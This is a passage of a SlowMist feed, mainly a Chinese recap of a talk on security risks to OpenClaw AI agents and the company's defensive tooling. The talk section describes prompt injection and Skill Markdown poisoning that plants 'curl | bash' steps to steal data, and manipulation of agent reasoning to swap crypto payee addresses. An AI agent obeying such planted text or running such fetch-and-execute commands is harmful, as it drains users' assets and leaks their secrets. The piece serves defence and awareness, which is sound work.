15px;line-height: 2;"><div style="font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: center;"><div style="padding: 10px;display: inline-block;width: 609.282px;border-width: 1px;border-style: solid;border-color: rgb(192, 200, 209);background-color: rgb(239, 239, 239);"><div><div style="font-size: 14px;line-height: 1.2;"><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 16px;"><span leaf="">慢雾导航</span></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾科技官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://www.slowmist.com/" target="_blank">https://www.slowmist.com/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾区官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://slowmist.io/" target="_blank">https://slowmist.io/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾 GitHub</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://github.com/slowmist" target="_blank">https://github.com/slowmist</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Telegram</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.me/slowmistteam" target="_blank">https://t.me/slowmistteam</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Twitter</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://twitter.com/@slowmist_team" target="_blank">https://twitter.com/@slowmist_team</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Medium</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://medium.com/@slowmist" target="_blank">https://medium.com/@slowmist</a></span></span></em></span></p><p style="letter-spacing: 0.544px;"><span style="color: rgb(0, 0, 0);"><strong><span leaf="">知识星球</span></strong></span></p><p style="letter-spacing: 0.544px;"><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.zsxq.com/Q3zNvvF" target="_blank">https://t.zsxq.com/Q3zNvvF</a></span></span></em></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://kyt.slowmist.com/cn/get-started.html">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=15463c17&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504616%26idx%3D1%26sn%3D95677483334baedb3127bdc0911fa2f8">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 02 Apr 2026 12:01:00 +0800</pubDate>
    </item>
    <item>
      <title>活动回顾｜慢雾创始人余弦出席首届 Agentic AI 创新与安全论坛</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504607&amp;idx=1&amp;sn=49e70d092b5e2e4d7278e85d822643f8</link>
      <description>慢雾将持续推动 AI + Web3 安全创新，为智能体构建内生防护能力，保障生态安全与可持续发展。</description>
      <content:encoded><![CDATA[<p><span>慢雾科技</span> <span>2026-04-01 16:15</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=38e9b24c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCITAhibvubPhhicVOH6dHibT1NuYPn4CM8d4ciaHWyk2Yl6TmFuVSzv6SGP4BDqbYkWq2pptbia6vCpMlHm4GxVoW7xeZjIRQfE8cl8%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>慢雾将持续推动 AI + Web3 安全创新，为智能体构建内生防护能力，保障生态安全与可持续发展。</p>
  <p><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3 月 27 日，由香港数码港、ME Group 及 iPollo 联合主办的首届 Agentic AI 创新与安全论坛暨香港第一届 Web 4.0 国际峰会在香港数码港盛大举行。本次峰会以“Agentic AI 创新应用：Web 4.0 时代的技术变革与产业融合”为主题，汇聚了香港特区政府财政司司长陈茂波、香港数码港主席陈细明、香港数码港董事及 Nano Labs 创始人孔剑平以及</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">著名天使投资人蔡文胜等政产学研各界顶尖力量，共同探讨 AI 从“对话”向“行动”跨越新纪元下的机遇与挑战。</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在代理式人工智能(Agentic AI) 备受瞩目的当下，其带来的安全议题尤为关键。慢雾(SlowMist) 创始人余弦受邀出席本次峰会，并发表了题为《AI 与加密世界的安全挑战及防御创新》的主题演讲，与全球行业领袖分享了慢雾(SlowMist) 在 AI 安全领域的最新观察与实践。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100020953" data-ratio="0.6666666666666666" width="602" data-type="jpeg" data-w="1080" height="401" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=655078da&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCIvXWA9ibGDhJBJsVoeTYksSib9JdWq8ouqAjFYSQHt5tw5tGQHmv0wCjbJHGJOLZtnFNOTXCkkJQuEkHJbNOBwrQ0hWcFNztlEA%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></p></b></b></b></p><p><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: normal;"><span textstyle="" style="font-size: 24px;font-weight: bold;">聚焦前沿：深度剖析 OpenClaw 与 AI Agent 安全威胁</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">随着 AI 技术不断渗透加密世界，以“养龙虾”(OpenClaw) 为代表的 AI Agent 应用迅速走红。但在热潮背后，一个更深层的问题正在浮现：AI Agent 的安全边界，尚未真正建立。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在演讲中，余弦从 OpenClaw 入手进行了深入拆解，并提出了一个关键判断：“文本即指令。”他解释称，在 AI Agent 的运行语境中，所有输入都不再只是“信息”，而是潜在可执行的指令。这意味着模型接收到的任何外部信息——无论来源是用户输入、文档说明，还是第三方 Skill——都有可能被直接解释并执行，从而将攻击面从代码层扩展到“认知层”。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6666666666666666" data-type="jpeg" data-w="1080" height="401" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100020952" src="https://wechat2rss.xlab.app/img-proxy/?k=82a7c2f3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCLFSHnIdONt2TG1nBmUIWM5Hfmj01miakwrVQlsDcHdW12lI2MxTByib54R2uLHhyQjCh1sC6dYVN1XNibabb1IAOic55CcJlwOTmA%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在这一机制下，攻击路径被极大简化。攻击者无需突破传统安全防线，只需构造精心设计的文本内容，就可能诱导 Agent 执行非预期操作，例如资产转移、敏感信息泄露，甚至远程命令执行。这种攻击路径的隐蔽性和低成本，使其具备极高的现实威胁。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">基于上述机制，余弦进一步总结了当前 OpenClaw 面临的三类核心风险：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">输入与意图操控（用户交互层）： 攻击者可通过“直接提示词注入”诱骗 Agent 执行高危操作。特别值得警惕的是间接供应链投毒——攻击者在 Skill 的 Markdown 文档中植入恶意指令。由于 Markdown 往往承担“安装入口”角色，原本的“说明文本”极易演变为恶意执行脚本（如 </span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">curl | bash</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">），导致数据窃取。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">决策与编排层风险（应用逻辑层）： 这种错误并非来自模型本身，而是来自“错误的执行逻辑”。攻击者可以干扰 Agent 的逻辑推理，使其在加密货币转账等业务流程中篡改收款地址，造成直接资金损失。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">模型层风险（核心大脑）： 包括模型产生的“幻觉”导致其执行不存在或危险的系统命令，以及模型从训练数据中误学到的不安全操作模式。</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">余弦指出，“OpenClaw 所暴露的问题并非孤立现象，而是当前 AI Agent 生态普遍面临的结构性挑战。”换句话说，安全问题已经不再是某一个项目的“个案”，而是整个行业都必须正视的系统性风险。</span></span></p><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: normal;"><span textstyle="" style="font-size: 24px;font-weight: bold;">攻防兼备：构建 AI Agent 的安全开源生态</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">面对不断演化的威胁形态，余弦在演讲中提出了慢雾(SlowMist) “攻防兼备”的安全思路：不仅要理解攻击路径，更要将防御能力嵌入 Agent 的运行机制，实现安全内建。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">他向与会嘉宾展示了慢雾(SlowMist) 围绕 AI Agent 所构建的一系列开源工具与实践方案，旨在推动形成一个透明、可验证、可复用的安全生态：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504374&amp;idx=1&amp;sn=aa99d127fe69cabd9107ea6c24cc08c2&amp;scene=21#wechat_redirect" textvalue="慢雾出品 | OpenClaw 极简安全实践指南，极简部署" data-itemshowtype="0" linktype="text" data-linktype="2"><span textstyle="" style="font-weight: normal;">OpenClaw 极简安全实践指南</span></a><span textstyle="" style="font-weight: normal;">：一份从认知层到基础设施层的端到端安全部署手册，为高权限AI Agent在真实生产环境中的部署提供了系统性的“安全思想钢印”。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504542&amp;idx=1&amp;sn=877bb46e71ffb4b97ef69748773ee304&amp;scene=21#wechat_redirect" textvalue="SlowMist Agent Security Skill" data-itemshowtype="0" linktype="text" data-linktype="2"><span textstyle="" style="font-weight: normal;">SlowMist Agent Security Skill</span></a><span textstyle="" style="font-weight: normal;">：一个综合安全审查框架，为 OpenClaw 等智能体增加一双“慧眼”。它不仅能发现常规 Skills 的投毒风险，还能识别链上钱包地址、代码仓库及 URL 的风险。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504357&amp;idx=1&amp;sn=c632f2459fe03685f87d2016f1d825ee&amp;scene=21#wechat_redirect" textvalue="MistTrack Skills" data-itemshowtype="0" linktype="text" data-linktype="2"><span textstyle="" style="font-weight: normal;">MistTrack Skills</span></a><span textstyle="" style="font-weight: normal;">：一个即插即用的 Agent 技能包，为 AI Agent 提供专业的加密货币 AML 合规与地址风险分析能力，可用于链上地址风险评估与交易前风险判断。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247501811&amp;idx=1&amp;sn=6a798626f6205fa8bac0d87f78c675a9&amp;scene=21&amp;poc_token=HBzBzGmjYFjAT41NrB4hmQMyXh7tkpVblhw_92EF#wechat_redirect" textvalue="MCP 安全检查清单：AI ⼯具⽣态系统安全指南" data-itemshowtype="0" linktype="text" data-linktype="2"><span textstyle="" style="font-weight: normal;">MCP Security Checklist</span></a><span textstyle="" style="font-weight: normal;">： 一份体系化的安全检查清单，用于快速审计和加固 Agent 服务，帮助团队在部署 MCPs/Skills 及相关 AI 工具链时避免遗漏关键防御点。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247501940&amp;idx=1&amp;sn=729c9b768a35b9299ff9ffd15676c68f&amp;scene=21#wechat_redirect" textvalue="恶意 MCP 演示" data-itemshowtype="0" linktype="text" data-linktype="2"><span textstyle="" style="font-weight: normal;">恶意 MCP 演示</span></a><span textstyle="" style="font-weight: normal;">：一个开源的恶意 MCP 服务器示例，用于复现真实攻击场景并测试防御体系的健壮性，可用于安全研究与防御验证。</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">通过这一系列实践，余弦强调：”安全能力必须内建于 Agent，而非仅依赖外围防护。”只有将防御机制与 Agent 的运行逻辑深度绑定，AI Agent 才能在复杂的 Web3 与 AI 生态中持续、安全地运作。</span></span></p><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: normal;"><span textstyle="" style="font-size: 24px;font-weight: bold;">系统化安全：ADSS 全面防护 AI + Web3 生态</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在演讲最后，余弦介绍了慢雾(SlowMist) 提出的 ADSS (AI Development Security Solution)。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">如果说前述工具属于“战术能力”，那么 ADSS 更像是一套系统级安全框架。其核心理念是：将零散的安全动作升级为可执行、可审计、可持续的系统化安全运营机制。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.0333333333333334" data-type="png" data-w="1080" height="478" style="margin-left: 0px;margin-top: 0px;" width="463" data-imgfileid="100020954" src="https://wechat2rss.xlab.app/img-proxy/?k=0ea754df&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCJPP0ZYu1kNbMHbbK49UZo73780AjuetbR5OrgJLLRCccUNEicicgEicvpVfZgia6nX9e7wBbic7WHHMDibicrQNLgxYdibSAs7dUoaxk8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ADSS 从多个层面构建 AI + Web3 的安全治理能力：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">L1 安全治理（开发基线）：建立统一的开发与使用安全标准，覆盖开发工具、Agent 框架、插件生态及运行环境，为团队提供统一的策略来源与审计标准。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">L2 权限与操作约束：通过收敛 Agent 权限边界、最小化工具调用权限、引入关键操作的人机确认机制，有效控制高风险行为的执行范围。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">L3 外部交互防护：在 URL、依赖仓库、插件来源等外部资源层面引入实时威胁感知，降低恶意内容或供应链投毒进入执行链路的概率。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">L4 链上资产隔离：针对涉及链上交易的操作，结合链上风险分析与独立签名机制，使 Agent 能构造交易而不直接接触私钥，减少高价值资产操作带来的系统性风险。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">L5 持续巡检与复盘：通过日志审计、周期性安全复核与运营机制，实现“执行前可预检、执行中可约束、执行后可复盘”的闭环安全能力。</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">余弦指出，ADSS 并非单一工具，而是一套可持续、可演进的安全运营体系。它旨在在不显著降低开发效率和自动化能力的前提下，通过系统化策略、持续审计与能力联动，帮助团队构建可审计、可升级的 Agent 安全体系，从而应对 AI 与 Web3 深度融合背景下不断演化的安全威胁。</span></span></p><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: normal;"><span textstyle="" style="font-size: 24px;font-weight: bold;">结语</span></span></h2></b></b></b></p><p><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" 